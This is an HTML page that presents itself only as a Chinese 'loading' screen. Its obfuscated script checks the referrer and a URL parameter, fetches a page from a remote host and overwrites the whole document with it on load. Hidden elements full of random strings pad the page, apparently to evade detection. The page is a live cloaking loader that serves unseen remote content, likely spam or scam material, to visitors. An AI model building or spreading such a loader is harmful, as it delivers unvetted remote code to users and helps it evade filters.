<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .x0T8cLfIGu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .x0T8cLfIGu .fZ2Jeb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .x0T8cLfIGu .content {
            line-height: 50px;
            text-align: center
        }

        .x0T8cLfIGu .img {
            width: 100%
        }

        .x0T8cLfIGu .v6MIwZ1zb {
            text-align: center
        }

        .x0T8cLfIGu .v6MIwZ1zb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .x0T8cLfIGu .v6MIwZ1zb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .x0T8cLfIGu .v6MIwZ1zb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .x0T8cLfIGu .v6MIwZ1zb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .x0T8cLfIGu .v6MIwZ1zb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .x0T8cLfIGu .v6MIwZ1zb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .x0T8cLfIGu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function WO8ES1IjkGQKg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oPCvWKM = WO8ES1IjkGQKg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oPCvWKM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oPCvWKM +".html?a=share";
		}
		
        MRXICtBjE=url+"#"+new Date().getTime();
        MRXICtBjE && function() {
            $.get(MRXICtBjE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>UVFxXdrPOCUSnl11WqveUEqW9JbpDOHVottuYzJ6CqYQj4UXli1ItCxWbGxdSFn70geuNnYpa5WZr5ytvI2s2J0LJWvw7a</p>
<b style='display:none' >gjiAp7BeBghogM6k</b>
<a  href='#' style='display:none'>Yph1VBZcOunTgOSYvkFqmpOWckERllWY6npiIUCnGP39BUkfrtvW9hIKWnPldM3</a>
<h1 style='display:none' >G4ibuLzqWtsj5Fm</h1>
<ul style='display:none' >BHdUs7KPn5CnWCZ634FRMMEalRdUPctWpAPpMbnkKEDerC9kMVwrFLm7aXGJQEzTd4G1WiGvW55qr11KKUYHMHQR</ul><div class="x0T8cLfIGu">
    <div class="fZ2Jeb">
        <div class="v6MIwZ1zb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >obO5uPB1WcCHrbTVV4pMi76cHnVNUr9dx7RxdWgwJacMzMeMrvaxa03sGp6AuOczyFEW4QNU6p749FF8H</li>
<li style='display:none' >obO5uPB1WcCHrbTVV4pMi76cHnVNUr9dx7RxdWgwJacMzMeMrvaxa03sGp6AuOczyFEW4QNU6p749FF8H</li>
<b style='display:none' >biml3bOebZ6Fyq3djVtpYIPfg86pdXCtbO9MMrHD8iQ7wQdUa7XjPiEf5mYAhd</b>
<h1 style='display:none' >EZPn4p5cembpwQUZLhZcYf1St3pPgF651BU5Tizo9pF0uyUEKcgXd9qSfONXIkWRm60ME8GG7K7gvMg3Zu5DixNAVnYtKQRvly</h1></body>
</html>